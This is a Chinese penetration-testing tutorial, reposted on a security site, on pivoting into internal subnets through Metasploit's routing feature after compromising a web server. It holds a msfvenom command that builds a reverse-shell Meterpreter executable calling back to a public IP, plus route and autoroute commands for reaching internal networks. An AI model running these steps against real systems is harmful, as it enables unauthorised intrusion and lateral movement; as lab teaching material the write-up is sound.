渗透测试 | 后渗透阶段之基于MSF的路由转发

admin 2021年12月2日09:06:34安全文章评论26 views1305字阅读4分21秒阅读模式

后渗透阶段之基于MSF的路由转发


目录

反弹MSF类型的Shell

添加内网路由

渗透测试 | 后渗透阶段之基于MSF的路由转发

MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们就可以使用MSF来进行探测了。

我们现在有下面这个环境:

Web服务器通过端口映射,对外提供Web服务。Web服务器上有两张网卡,内网分别还有其他两台服务器,一台开放了http服务,一台开放了SMB服务。拓扑图如下:

渗透测试 | 后渗透阶段之基于MSF的路由转发

01

反弹MSF类型的Shell


我们通过web渗透,成功往Web服务器上上传了一句话木马,成功用菜刀连接。

然后我们现在想获得一个MSF类型的Shell。

我们先生成一个木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=112.74.89.58 lport=42906 -f exe -o test.exe

渗透测试 | 后渗透阶段之基于MSF的路由转发

用菜刀上传到Web服务器上,然后执行我们的木马程序,Kali成功获得反弹的MSF类型的shell。

渗透测试 | 后渗透阶段之基于MSF的路由转发

渗透测试 | 后渗透阶段之基于MSF的路由转发
02

添加内网路


然后我们现在想要继续渗透内网。

我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段。

run get_local_subnets


渗透测试 | 后渗透阶段之基于MSF的路由转发

如果我们不添加这两个网段路由的话,是探测不到这两个网段其他主机的。

以下是手动添加到达192.168.11.0和192.168.12.0的路由

#在全局给指定的session增删路由route add 192.168.11.0  255.255.255.0  1     #在session1中添加到达192.168.11.0网段的路由route add 192.168.12.0  255.255.255.0  1     #在session1中添加到达192.168.12.0网段的路由route add 0.0.0.0       0.0.0.0        1     #在session1中添加到达0.0.0.0/24网段的路由route del 192.168.12.0  255.255.255.0  2     #在session2中删除到达192.168.12.0网段的路由route print    #打印路由信息 #也可以在进入session下添加路由run autoroute -s 192.168.11.0/24             #添加到达192.168.11.0网段的路由run autoroute -s 192.168.12.0/24             #添加到达192.168.12.0网段的路由run autoroute -s 0.0.0.0/0                   #添加到达0.0.0.0/0的路由run autoroute -p                             #打印路由信息

渗透测试 | 后渗透阶段之基于MSF的路由转发

以下是添加路由前后探测的对比信息。

渗透测试 | 后渗透阶段之基于MSF的路由转发

渗透测试 | 后渗透阶段之基于MSF的路由转发

注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控

主机可达的地址就都可达!


END


来源:谢公子博客

责编:Vivian

渗透测试 | 后渗透阶段之基于MSF的路由转发

渗透测试 | 后渗透阶段之基于MSF的路由转发
渗透测试 | 后渗透阶段之基于MSF的路由转发
由于文章篇幅较长,请大家耐心。如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
渗透测试 | 后渗透阶段之基于MSF的路由转发
渗透测试 | 后渗透阶段之基于MSF的路由转发

渗透测试 | 后渗透阶段之基于MSF的路由转发

本文始发于微信公众号(谢公子学安全):渗透测试 | 后渗透阶段之基于MSF的路由转发

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月2日09:06:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试 | 后渗透阶段之基于MSF的路由转发 http://cn-sec.com/archives/484722.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: